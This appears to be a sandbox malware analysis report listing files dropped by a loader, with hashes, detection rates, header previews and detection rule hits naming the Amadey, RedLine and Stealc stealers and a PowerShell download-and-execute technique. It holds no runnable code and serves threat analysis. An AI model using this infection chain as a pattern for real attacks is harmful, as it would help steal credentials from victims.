SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\penis.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000254001\penis.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\u3uP67496d.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\u3uP67496d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6600874
Entropy (8bit):	6.623257126100034
Encrypted:	false
SSDEEP:	49152:vrQMi0TVaIf0qzqiL9W8vy7GsDW0NtRN5moshpmxHDDcznoGLSctQ7HUCDjQlOlZ:voAjYD1mOfc7FSctSHU0jQlOl/iS5w6
MD5:	CC4200197F1A0D06603CB47B59F1362B
SHA1:	20C0D508071AEC082BF246EA6D43550210817ABE
SHA-256:	7FBF48D0029650B48AF23FA6D7D02CD783CDF679E369EA43A7040C8F3DBB6015
SHA-512:	9E8FA1A1BD596747E9E614D03D48D056D534EC8ECF82897B53477EDD70D6F77DE9EA30F72B9D140D4804EE364AAA3F67B8F0215FE04FFC32C51DB9A9BA2E5E6C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.x^..%.........#.jG...Y...f...........G...@..................................+e....... .........................B..................................................................T'H......................................................text...4iG......jG.................`.P`.data...H.....G......pG.............@.`..rdata..x.....G.......G.............@.`@/4......$....@H......&H.............@.0@.bss......f...K.......................`..edata..B.............K.............@.0@.idata................K.............@.0..CRT....4............K.............@.0..tls.................K.............@.0..reloc...............K.............@.0B/14...................Y.............@..B/29..................Y.............@..B/41.....XL.......N....[.............@..B/55.....B.............[.............@..B/67.....T.............\.............@.0B/80.....a.... ........\.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\acentric[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	464896
Entropy (8bit):	5.410841803375821
Encrypted:	false
SSDEEP:	12288:QeeeeVeeeeeegeeKVe3zJQX7MHv+xY2DxDdeeeeVeeeeeegeeKVZ3zY:QeeeeVeeeeeegeeKVe3zJ7QdeeeeVeeq
MD5:	37D198AD751D31A71ACC9CB28ED0C64E
SHA1:	8EB519B7A6DF66D84C566605DA9A0946717A921D
SHA-256:	1ED4A8B4C74AAB435EA5CD459D5AC961E5A8CA28924801BD84D336135F30EFDE
SHA-512:	60923C0A8CE5FD397D49749CCEE68CA3FE294D7323551CE9755410AC16BFFF56A35BEE3E6B9A67D57CDFCB43E4F164712F33CD255B76689174DCF4C475976C96
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..L..........vk... ........@.. ....................................`.................................$k..O............................`.......i............................................... ............... ..H............text...\|K... ...L.................. ..`.rsrc................N..............@..@.reloc.......`......................@..B................Xk......H.......(6...,...........b..0............................................0..I........~....}.....(.... ....(.....(.... <...(.....{....r...po...........o....&....0...........('..... .u.5C. .w)F5.. C..6;..... .w)F.}8M.... .d?^;..... c...P. .u.;....8.... .O..5.. .np.;..... .O...v8..... R,...W. ..G.;..... B.J../8.....r...p(....:....8.....r'..p(....:....8.....r-..p(....:....8.....r5..p(....-t8.....r9..p(....-h8.....rC..p(....-\+x.rM..p(....-S+i.rU..p(....-J+Z.r_..p(....-A+K.rg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	986112
Entropy (8bit):	7.987134427472388
Encrypted:	false
SSDEEP:	24576:6MGVJ/Oap+Bh45LEwaV1QghDHm5GQTSmGg:6NJ/jpi5waVhjm5GQ2m7
MD5:	1EF39C8BC5799AA381FE093A1F2D532A
SHA1:	57EABB02A7C43C9682988227DD470734CC75EDB2
SHA-256:	0CCED5B50789FCA3AD4B2C151B798363D712DA04C377BD704DCEF4898E66B2B4
SHA-512:	13A9C267C4CEB2BD176F1339FAA035FFEB08936DEEEB4E38252EA43CFE487EA1C1876E4CC2A965548E767AF02805A1DA62885E6538DA056BE0C6FAE33B637682
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'1.f.............................!... ...@....@.. ....................................`.................................(!..W....@..`....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................d!......H.......P....G...........U.............................................."..(.......>..(.....oV...&.s..........0..........(.........(....o....3.(....-..j~....%..(....~....o.......j@8...(......s.......o........&..o ...s!.........o".....,...i-....,...o#....($.....o%...o&...o#........(....(......(..........c.o'.......o'........c.o'.......c.o'.......o'........c.o'........c.o'........c.o'....o(......j....+)....o)...nX.....bX.....da.....o*......X......3....bX.....da.....bX....!.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\splwow64[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1381143
Entropy (8bit):	7.942673979265856
Encrypted:	false
SSDEEP:	24576:b9yEBs1ZKaxv6rRVO9VdLCjJehm4v2TeLUzguXpdQhgRQ7SoYafkW:bxqZK66rb4V0cxtQzv5dQhgRQ7SxID
MD5:	2B01C9B0C69F13DA5EE7889A4B17C45E
SHA1:	27F0C1AE0DDEDDC9EFAC38BC473476B103FEF043
SHA-256:	D5526528363CEEB718D30BC669038759C4CD80A1D3E9C8C661B12B261DCC9E29
SHA-512:	23D4A0FC82B70CD2454A1BE3D9B84B8CE7DD00AD7C3E8AD2B771B1B7CBCA752C53FEEC5A3AC5A81D8384A9FC6583F63CC39F1EBE7DE04D3D9B08BE53641EC455
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%46%46%46,R.6&46,R.6446%56.46>..6+46>..6$46>..6$46Rich%46........PE..L.....GO.................p....>..B...8............@...........................G......&....@.................................4........0G..r....................?.H....................................................................................text....o.......p.................. ..`.rdata..b.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc....r...0G..t..................@..@.reloc...2....G..4..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	689664
Entropy (8bit):	6.8668413422174535
Encrypted:	false
SSDEEP:	12288:lht5Z3o/mPatX0hz6hWIShEYZUuWygFYK1hsHyLMLH/KweErse7K4m6o/OGSew/X:lht5Z3oCadeb
MD5:	B859D1252109669C1A82B235AAF40932
SHA1:	B16EA90025A7D0FAD9196AA09D1091244AF37474
SHA-256:	083D9BC8566B22E67B553F9E0B2F3BF6FE292220665DCC2FC10942CDC192125C
SHA-512:	9C0006055AFD089EF2ACBB253628494DD8C29BAB9D5333816BE8404F875C85AC342DF82AE339173F853D3EBDB2261E59841352F78F6B4BD3BFF3D0D606F30655
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................z..........n.... ........@.. ....................................@.....................................W....... ............................................................................ ............... ..H............text...ty... ...z.................. ..`.rsrc... ............\|..............@..@.reloc..............................@..B................P.......H.......(...........J...................................................D...>n..8...2..ax...^s(O.L.~.g..?....M6...;.u....=.k.d..w-X^.k\|..e..Qv.i..".n......s.W..Dl.\s.U..v..CEix.1...G....5..eM...k..[..wx1..).w..._...Tp...2F..S..U.@.6...'..qB.]O...R..0./....ES_{\|..H.?...<.w.....m...f.T..e._.l.g...']..^...u..lC......{..d0...s.G....Fo.....vt.L2k\|w...Sr...B.1.Y2.W".....,.}....7.c..^........H.....p.!U...g.M7.m.......OG1......Is.>....?pEH....rO....:\....].

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\5[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	153485312
Entropy (8bit):	2.996715171813733
Encrypted:	false
SSDEEP:	196608:M6w14M5FEW9izuHCeCF/JGCNfMxFE5umE5N6HPu/x9/Ckg8Lng:7w14SfIzuHVCzGUS1JnT/P/1bLn
MD5:	3F55FA60CF0DE16BD6FDE091F50D17F0
SHA1:	39ACD4314FFC901FBD9396ED2602D448A84B9BED
SHA-256:	5DBF58D575DAEBB253C692B15F5A55E8D50ECECBCA8D04306D833E80828A894D
SHA-512:	3E5650D2CBBB4084CDBF56D70B74A2502FD3EC1A4BFD242D4D45912137F14C38260CE70A3745668A3ABDBF2058EC85AF3B7051C3A4FE6BDD4D14CF9055434E67
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.6[..f.................@.........................................`... .........................................N.......8.......zR....y.d............@..`.............................y.(.......................P............................text....5[......6[.................`.``.data........P[......:[.............@.`..rdata.............................@.`@.pdata..d.....y.......y.............@.0@.xdata..`....P......."..............@.0@.bss.........`........................`..edata..N............0..............@.0@.idata..8............2..............@.0..CRT....p............H..............@.@..tls................J..............@.@..rsrc...zR.......T...L..............@.0..reloc..`....@......................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	321536
Entropy (8bit):	7.984064781404801
Encrypted:	false
SSDEEP:	6144:/6ZNaeEuexVOkKu/A9UZMOqMVr57KLMLPQ5uRXg6hUm8:/BvOkHPEUsYLeIXgDm8
MD5:	FF5AFED0A8B802D74AF1C1422C720446
SHA1:	7135ACFA641A873CB0C4C37AFC49266BFEEC91D8
SHA-256:	17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
SHA-512:	11724D26E11B3146E0FC947C06C59C004C015DE0AFEA24EC28A4EB8145FCD51E9B70007E17621C83F406D9AEB7CD96601245671D41C3FCC88A27C33BD7CF55AC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f................................. ........@.. .......................@............`.....................................W............................ ......\|................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H..........................................................................h7....c73..w..V)J.:..a.W'.=.\|...Q&.....p....IIoO...g...Q...P.~CM...v@.P..Sl....a=..:u?ED."..Jp....2..r.B..H...?.v..0]2.....>..F.}.s6..N...h.#.....Z.6..g^gu.aW&.2.n?.v...S...}.!.^..E.h.dp.....fc4{../O..I....v.Q,U...>xK..c.D.../..E7...T...t......y...f..SC....).F.m."2...Ms.3"KL.e..zc.Bb.-.l.\......TYQ..B!.......?.......e]4...../(5......5...4.......'.[.g$.....gb;e..Q..r.Ge(a<..qC.J

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082545442352462
Encrypted:	false
SSDEEP:	3072:Eq6EgY6iArUjOvWUJwPYT8QADFKoRJTA+tJSiK1cZqf7D34leqiOLibBOT:vqY6iULwP/xnRJTAKJ81cZqf7DIvL
MD5:	58E8B2EB19704C5A59350D4FF92E5AB6
SHA1:	171FC96DDA05E7D275EC42840746258217D9CAF0
SHA-256:	07D4B7768E13D79AC5F05F81167B29BB6FBF97828A289D8D11EEC38939846834
SHA-512:	E7655762C5F2D10EC246D11F82D437A2717AD05BE847B5E0FD055E3241CAACA85430F424055B343E3A44C90D76A0BA07A6913C2208F374F59B61F8AA4477889F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.395265378509869
Encrypted:	false
SSDEEP:	3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
MD5:	7A02AA17200AEAC25A375F290A4B4C95
SHA1:	7CC94CA64268A9A9451FB6B682BE42374AFC22FD
SHA-256:	836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
SHA-512:	F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\12dsvc[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	903168
Entropy (8bit):	7.997700688704897
Encrypted:	true
SSDEEP:	24576:9YroRg0QD2ZDvpSgezC2pSSqb9VAMsGm1ykciQgh75tT:9YroRmgSPC2MSpMsGmGiQg95t
MD5:	84263AB03B0A0F2B51CC11B93EC49C9F
SHA1:	E6457EB0E0131BEC70A2FD4D4A943314F0BD28D4
SHA-256:	7D6E4E01C452DD502361640EE095E2BEE35E3F55FD11EDC9E94C3580D2C132B5
SHA-512:	DB35A02345B5166077E300524675C523A8B4082FA62FC151C0797141348CAE5E173EEAEC5AD1E95556E048EA6ED34A78B90B1184420557C53CD91F351417EBB2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.f................................. ........@.. ....................... ............`.....................................W...................................\................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........................................................................k...(.Q...GQL..q.....Nqr.\.^v.E....<..@=...)!b.=qQ...B.c.....<.q.i. A.QE,T..~f.X3.....~..$.).(8t.........r.c@...i.2.?.-.8..-.....:...'I.`D...?/3?...WP.'...XLz....b.\| 2....*...\........B....Hg$3p.\|+s..K....Z.m.`....w..w.i.Vt..n.LL...d.`a.O..T.......#k.0D@d..8p.{.?Z..-..\W...,.(..P..&`L..?Z..J,y.:...9rY..........D;S.;..3..{..c...,Q........+bN.U.../E..O[....[..W...=..r..x.'...q.S".y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed86be077bb_12[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10796768
Entropy (8bit):	7.884437457246237
Encrypted:	false
SSDEEP:	196608:I7A71NIOC732QZMymBHd+3WGeFdJJMGHPP/CPZ5za/+qKcDxNY5fv7RFHnTKm:IA5NIOC73RdmB9+ReFV/m5zQAfHHTF
MD5:	489F9C4FC0AFA8D1BE37BC5E2F57833B
SHA1:	C2BAC602A73C19B345B64E0B7CF2F837BE307B61
SHA-256:	D9DBFBC8294CBF6A32D43413ED328594EE058D7356C26EB5CD196F9F4867C078
SHA-512:	7F43D972F58A025D09143C57351221FE7B10C1756A0C5578AC42698C21EA05986D4BBC0C7FF4BE339C2D0930B505E4F4DDA53C0800D84B059A21BE938ADB678E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].g...................N...T.....~.O.. ... O...@.. .......................`......e)....@.................................0.O.K....@O.V.T.................@........O.............................................. ............... ..H............text.....N.. ....N................. ..`.sdata....... O.......N.............@....rsrc...V.T..@O...T...O.............@..@.reloc.......@.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Blenar[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5492542
Entropy (8bit):	7.933542408650758
Encrypted:	false
SSDEEP:	98304:MVZklJQyhAl9gN4sldQzfC6lmzlt6yvi0WcHlPLeqNZ8hY/bUZqTxQeeBxZAsSHf:S0vOl5zqv/6H0XlPKQ8hY/b0qlteXqsF
MD5:	E277DBB7AFA4631D4ABCEF9183671836
SHA1:	71EF01646FA13B0A49550283D5BE12539526C724
SHA-256:	3A72E66E73B857A6E2E004CFA4E6EF4EFA872AEDF7941E94637BF74B5591DEB3
SHA-512:	E9DE17DB72EF4DB18615E411823A2D6A3BB8AB870B508DEFCCA8045F75C1D89F52EF7F3A9B1BC957DAD1311EF0BFB2F1A0D411F82FA3F596F1FEFB6B48F8B770
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..........^.......\|............@.................................P.T...@.....................................d.......)....................p.........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...)...........................@..@.reloc.......p.......\..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\JavvvUmar[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6608463
Entropy (8bit):	6.63150177563214
Encrypted:	false
SSDEEP:	49152:L7iMfyB4m8REZLzwo98xZtKWpn3XghJmU8YAsJ7GYp6UHBI0/0kB02hT6Px8UFF9:AZZbhT6Px8UFFpeA993PLgumY
MD5:	E17DD8E8ED9803018341037275960E16
SHA1:	90EFA4499A4F4F6A8E1D5F91F3A96E8E49B0E8AD
SHA-256:	7E3BA2AA30018F5B9AFF92A945F659768100D8AC1338AFAD49F092B17120A7A5
SHA-512:	127321309E7F30B2DF29A0303C8E0D4C86CF2513D24018A76AB051880B068862ED2F2EDB2B7E612D78668020D66C40CA4E26DBD64AD5ED73B02C597F5A4C5589
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.f..^..%.........#..G...Z...f...........G...@..........................`.......2e....... .........................B.... ...............................P...!...........................oH......................!...............................text...4.G.......G.................`.P`.data.........G.......G.............@.`..rdata........G.......G.............@.`@/4......$.....H......bH.............@.0@.bss....4.f.. L.......................`..edata..B.............K.............@.0@.idata....... ........K.............@.0..CRT....4....0........K.............@.0..tls.........@........K.............@.0..reloc...!...P..."....K.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL...@...N....[.............@..B/55.....B.............\.............@..B/67.....T.............\.............@.0B/80.....a.............].

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
